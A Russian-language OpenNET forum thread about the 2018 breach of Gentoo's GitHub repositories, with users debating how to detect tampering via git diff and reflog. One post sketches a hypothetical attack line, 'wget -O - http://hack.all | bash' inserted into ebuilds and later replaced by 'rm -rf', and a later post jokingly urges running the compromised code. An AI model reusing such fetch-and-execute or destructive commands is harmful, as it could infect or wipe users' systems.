The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Взломана инфраструктура проекта Gentoo на GitHub, opennews (??), 29-Июн-18, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


10. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Anoemail (?), 29-Июн-18, 09:43 
Очень может даже быть
Ответить | Правка | Наверх | Cообщить модератору

11. "Взломана инфраструктура проекта Gentoo на GitHub"  +5 +/
Сообщение от kvaps (ok), 29-Июн-18, 09:56 
Я вот не понимаю это же гит, он и запушить то не даст если дерево хоть как то изменилось.
Ну и если этот репо просто зеркало, то неужели не достаточно diff с оригинальным репозиторием сделать, тогда точно все изменения отобразятся.
Ответить | Правка | Наверх | Cообщить модератору

18. "Взломана инфраструктура проекта Gentoo на GitHub"  +5 +/
Сообщение от Аноним (-), 29-Июн-18, 10:13 
> Я вот не понимаю

А ты попробуй пойми. Не всё лежит на поверхности. Ведь главное - это не статичная картина последствий, diff сделают, не волнуйся. А интервал компрометации сервера, когда зловредный код распространяется, вероятно, тразитом, на разный узлы.

Какир добавляет "wget -O - http://hack.all | bash" в код ебилдов. Какое-то количество хостов заражены и начинают творить дела. Какир ребейзит, заменяет wget-коммит на хулиганский "rm -rf", делает housekeeping на сервере, еще какие-нибудь манипуляции, и, вероятно, в репах не остается следов первоначальной деятельности.

Куча вариантов

Ответить | Правка | Наверх | Cообщить модератору

85. "Взломана инфраструктура проекта Gentoo на GitHub"  –2 +/
Сообщение от Michael Shigorinemail (ok), 30-Июн-18, 00:01 
> Какир ребейзит, заменяет wget-коммит на хулиганский "rm -rf", делает
> housekeeping на сервере, еще какие-нибудь манипуляции, и, вероятно,
> в репах не остается следов первоначальной деятельности.

Сломав rebase -i и не сделав заранее старый добрый тарбол, засаживаюсь смотреть git reflog -- там следов есть.

Ответить | Правка | Наверх | Cообщить модератору

99. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от anonymous (??), 30-Июн-18, 20:49 
Я тоже всегда ищу под фонарем. Там светлее.
Ответить | Правка | Наверх | Cообщить модератору

112. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Аноним (112), 28-Ноя-18, 19:40 
reflog - это локальная штука, reflog какира посмотреть не получится
Ответить | Правка | К родителю #85 | Наверх | Cообщить модератору

23. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от Юрийemail (??), 29-Июн-18, 10:27 
Зачем вообще diff делать, залейте по новому свежую ветку и всё!!!
Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

33. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от A.Stahl (ok), 29-Июн-18, 10:45 
Видимо есть желание не просто восстановить инфраструктуру, но и разобраться в причинах ситуации и в целях злоумышленников.
Ответить | Правка | Наверх | Cообщить модератору

35. "Взломана инфраструктура проекта Gentoo на GitHub"  +3 +/
Сообщение от Юрийemail (??), 29-Июн-18, 10:51 
> Видимо есть желание не просто восстановить инфраструктуру, но и разобраться в причинах
> ситуации и в целях злоумышленников.

Залить рабочую на гит, а копию повреждённой потом изучай.

Ответить | Правка | Наверх | Cообщить модератору

64. "Взломана инфраструктура проекта Gentoo на GitHub"  +2 +/
Сообщение от Аноним (64), 29-Июн-18, 14:41 
> он и запушить то не даст если дерево хоть как то изменилось

На жидхабе можно включить перезапись коммитов и сделать git push --force ;)

Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

104. "Взломана инфраструктура проекта Gentoo на GitHub"  +/
Сообщение от Наркоманка (?), 02-Июл-18, 16:48 
Да все ок там. Просто ради прикола пару echo добавили тут и там. Рекомендую загрузить и самим посмотреть через выполнение кода
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру